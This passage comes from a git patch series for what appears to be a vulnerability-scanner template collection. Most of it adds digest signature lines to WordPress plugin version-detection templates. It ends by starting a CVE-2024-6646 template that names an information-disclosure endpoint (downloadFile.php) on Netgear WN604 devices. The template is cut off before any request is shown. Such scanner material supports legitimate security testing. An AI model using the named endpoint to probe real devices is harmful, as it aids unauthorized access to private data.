4b0a0048304602210085e35ab4c794304a1e507f4829630ad5297f8acc62b9b374272ebbb2c5b1586f022100ae88b108b5bafdd7efcbb701546930418ec3a40a7cd7ceb3c792f156c12441a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..2b5782ef18 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5a9b667e87a5982da681ef99e11b45027fa6136b778d2f11a79edff7d445856022100d3e6f676060dd1f01caa899145aa91d08988fb282690b3ac9f0055ce8b603d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..20e35fa5c3 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202539f2289af9fe0a83e3c377e79a908fed78a3bc5362ef01a812e75541deb97d022100bd06b3ead68ea556ad4b3c3e8630c56c055ff2c45cb960d01dfdf57587b14b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..abd84d2997 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044fedcf9e079b6c40ce3ef02fec84bea191aee863c0b40e96ae312f8f53d29a502200413e86e46b90add5a5d2b71e5ff2420e781e04622fb734c562abbc8a1af061d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..81b0e46bd6 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e24596f995d1306d64cd499a62bf177d9893c06398108855a91cc3342975e7c6022049b9faf49b898c250b5d70085a4472f672000f404fdff28daecdb326128d2256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..324d2d5ace 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac84299f69147522c38339820e9e29f60308481580168ddba38078e961f88ebb0221008776197130f6c6e892849503f5451c727835eb2a350e3f3464ac847f1b206e28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..34cbfd4483 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022061a0e33b086ee97fb49c32c4fc5d756f07f933b917f2a3da158904b30a2ff1d7022100ba5a347ab487e136f67b8504558790da6f89d03d2223856264617d428f68c98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..accfb833a6 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087e24cbcf18e89b6af720cd3b029309878e790b255ce9e888ae2f0ab07b4d2d30220402bb4058a6d7389fc92c3616e1f446ed44bb47ae9c9cdf6d2286bf4dc68c03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..efe627f010 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec0d8c3bbb72f2a6eb6916863bb3e6dd5f3f100dde1e9916c29affd8b93275fb02207bb77aaae343e3f1a5a9ef6d82a6e265cccb980aedc9c8049a89c4a304917af9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..9813e8fc85 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4591db17c514057b4363d7a49272003b791ab3fe0788bd32b2a31ac7b00e8d90220443e39e7abbca6292d38b1efc5064c83bde4e7d781e82ea8d9300a4f9679e9a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..6c1b11362f 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052585b19c9d0ae752c34a3a45dc626cdb1abced44c07301e2f7c690743dabbff0220311a0dabfcd676b8500795f2a2060befd4e0d64db46479c1ea928f320b46b850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..4697065c8e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c80d7372c8ee6fd4616cacbd82b26f27ec60430540fa126a0e78e6520bfe869022100dc59690343bfee07cfc9970d3fbbd845468d72723fc7db44096219a427a2dfd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..97a6c05da0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c5fd859323cde775efba79f1d6b0ebd39db0fd2bd3ccf26efb91a49e3cf4eec0220232243bfb2a8019bb410074972d11b94f52bea8fb442391cb934806b58e1e31a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..df0029c643 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b11201d71adc714b3408c1fcf2393b820890551a3dab02928f2b4a1fd48e1fb702200688a5d234918e88ac35938c17fd1ab346c3346f4ff86e52e7fe397ab1f044b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..2fe6da2460 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220015b9bc1d9aa1f7e6a2c2435fa42ce9ad8c6b0f17db2b4e93c12023cafe49038022100b952999d54750c51053798fb98c94e4b99e91d0b2a44cb28d14f4e9f455f6b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..926c81f522 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071f0c94eb3f66e5d459aaf967887969c2e4e9768f1eb4703bc9d502e522c0f560220753af9b673aeab762f844909dd5cfacf038b160a4a0e7ec8eaf522670a78bcbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..4e6a953933 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b800b58fba149cc7889140df2dad6a16444e09fdd8f6c90bae5f39f4a1705d1502201e79b5d1564929bd78518d75fd719aed3864b09aa939e5ef90c17b72a8791dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..e3c1312ee0 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c396273006c1727daf6fc25f1e2bb9e356b8327b4bd0f2b76d5c78c1097d3202022100f9cddbc708db9d93a15b2be8b73ee183246e8f43c40e8ee653f72fa2ab2cfbe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..a019136526 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f704170965f6d0325eb87ed658ebf30de95dd2fcba734dfd3a45192c17cc0dd902203c302113d402051b2a5e552ed70558e06f724a40232cb445519305fb86bec6d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..ac7d085b60 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5418b4312a0a17ffb4664d0a85f17e50bea694421ce2dddaa075abadf09453d022100e5134610e77f75c55f432baa0ee32d1667c42af02a2c0e0f7f4ebbf340f68790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..8709e1fa2d 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a2a5e942a94d3afd7d232aa78f378d50e7d6b28ac83786838df09a753ecfbf5022100f74a2bcf2a62047126cff63faea13b658165b781fec52accef2aebb9e4f0e34a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..94193cdfa2 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205826979e3c2660e146d7da9e4e5a9454112f73761462f34b30361209b79e063d022067c72139fa3e1a306bf7a297c3ac8b757af4368ce42b92dad85daac44674a5ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..9acd0883a7 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204965e163701b859e8fc665538342f20d726096c384185c085fa4bbacd7d742e002203a7816ceee938f6b3ba2c99adcef5a82bb7b4ab362c307cc575e258e1bc55e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..68e6dae4ba 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201492a1b146d37f2c1997610da5886bf3416d654d7b6435219e2dacc0f139c17a02201911d4819e4d892aae0034b208d366e050b27530324704b116b61b79c8a2b0fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..48acec7113 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc8252603de333c2a1452933e73f093bbc1120ee4614c6ba1e2b4039bde5a434022042ea990cda51853ebbd8c1bd7e0fb6de2c4160cf2324ea29fa89a18deeec9dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..298945caff 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e158ca51fc7207b3297bf512293e74a59da59c3ac005e667d27e231cb99d67b0220505be73cbc6fd49d0e4c29129b9b67f8b3ee8898bd368669581aef857c61d0c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..33fff84212 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206daedd37788fc76eb604e91a9723d3ab37c1ef7d47790e1c0b00e1366dbea5b7022100b40f79e3d1737d21b2b6b5c30c241c251e730d13b1409d40e3675eee159a4b16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..238fceb248 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc91dcd3a10d2f06fd1677914ce9288c30686fbca9e25ff32f6a6da864f8e40c022100a1dfc7cb2826be0e259925b70e82bfc6cf908c1b6b608dab53843b4470df6ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..7aa5646353 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220772657ef74d41a314b4ae33a117ff5c8e7943915f74755063426edf0aa5a733c02206dfa427babd6df321bbe87f489ba1560942f5a74487503e70f991f1d2340465a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..ce6423ff19 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0351be43b5208974434bf157ce5457246be0a820d39c59d4e431203a492c1f40221009150416600617bef0499b49931188517844a2ebd06b6c074266a6fe34eb170af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..6b35d35c7e 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089053add319adb71976f8cf106f0999c137d9d64c34f4844b380bef41427b55302210083b0fff3f04d764f0fe8c0c9f06e99d79d02756f6d6f458fe13e9b4d15bdd555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..200c713615 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220458a24270e4c7930bc7f6a634923d1201263ec4253ed3c79d73d3bfa3fa5268202205a64d410deb259e4a03033890534277b6d83c2f3da3dd0d8646a6548cc76d03c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..2f409c854a 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009977e2d070496bb79ceb714b3a79fc9982a07cde6e4a523bbf14268ce2484796022005d3f2903c92d68934658c6d347057ccb10b01d1db857e4ca26d47c3188fe64e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..8898760b54 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb764a3ac2acacdbcf9ae34ecd48849df62e40d07dc60aa3cca758ddf3aab8a5022100c1138aa7a8e46131df8a3ae1f41105df1e8d6af93692fca3f4bdfa0060e67352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..28eb3cb4dc 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090c90142ceee8dd908da4b217814a8b0888de2a271058b28e107dc71174d10460220610eaa6a183ec74c1fe7ae10b88a246e3489ab6acb404518541d1e465882cf85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..f30a61833d 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022007193b4c16021851037e35a5d178728f0757340decc18c0a071fbcc9fdcefc94022100e5253d73641df51891a8b6d57e7768bf8d3626a79c9c920bbf8e244cbda087c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..9d392cea99 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087b90a19c44e0f1d898e1d2d7c0ed0952a489d6e4cc3c699c803761f50179b9702206a98b496d7d5fe808c26e2e55a4c75fde0d0211f362697edf75bc782a93ac93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..b50d724336 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ba059da1a3ad3b6d223ad26d4e392dd8f2091b81b1ea021918cd3a871b5e22402205ef6fcca57755650d979dac296f30a632661a2f19522551768930015c395bb53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..3474ab7c05 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220466a09cd2fbbba6352b449c5f9cb6861a6c3fab34b83d6845ac6feec7d9cfefe02200417046276f56f05c615561b925c4011fed8e895158334b7f2aaa43e4412e955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..849404e0d9 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fdd02cae6bb8e5aa34fd84636a1efa22133dc1dd77391cf093e76747fc09017302202636e537da6e35b85d2edb81d865cc19c8e57ca7e3973092a355b8e4721df20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..603bdc8142 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5fcaf0afe92479da6e90390343e73d7d9dd172747e0dec397bcc92b0794060702202f6babb2db792e318b4f5b8cd82c3aee6a822f97f8164a4b7e9f69eb176b23f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..b708e4b78f 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026cca5baa6324684709df026ee1c82046cd760a2f8dd3efb7181f2b3aee3f0f302201746067f5ecafefb4908fade06d253fb6be18cb2722984c67c4c25ae52537ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..cb13303fda 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8c5f8bf533ac8e1f14466637d4d1c1e60f46abb4dbce23cc980237509df83ac022059dbc4001995efe2ea081d11bf853e3a2deedeb56bbbf59cf3bc615da4b86c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..b611d59ade 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023e9d60c3b15084a771997fca4a01dfce08af677e4d7bdfd3f256409888acdc4022100fd007492509c852a3b6b5828564efd1fff385559de08311ecac5f5888ccc2de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..89dd065a43 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207cc19dae8ac9fb8992d01107aea3b451d279845a044e58af3f9120d5943ee8e902207866eae44522a35d3606e5881941bc93ce18c9319005d9d3ce51ed0d8b4a9223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..b03db6cfa9 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a08564d2ecfc92a20cb04fff83073bbef91786295067d32646338909dc1d881022100e00222297554289c6a5d68738f1aa7181e906f5f2fe1d9828192b97eafbed7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 09047fe89c845a6f99ad3a642aaeef3ee65e0d01 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 17 Jul 2024 19:44:36 +0530 Subject: [PATCH 1326/1841] Create CVE-2024-6646.yaml --- http/cves/2024/CVE-2024-6646.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6646.yaml diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml new file mode 100644 index 0000000000..70ce3862ac --- /dev/null +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-6646 + +info: + name: Netgear-WN604 downloadFile.php - Information 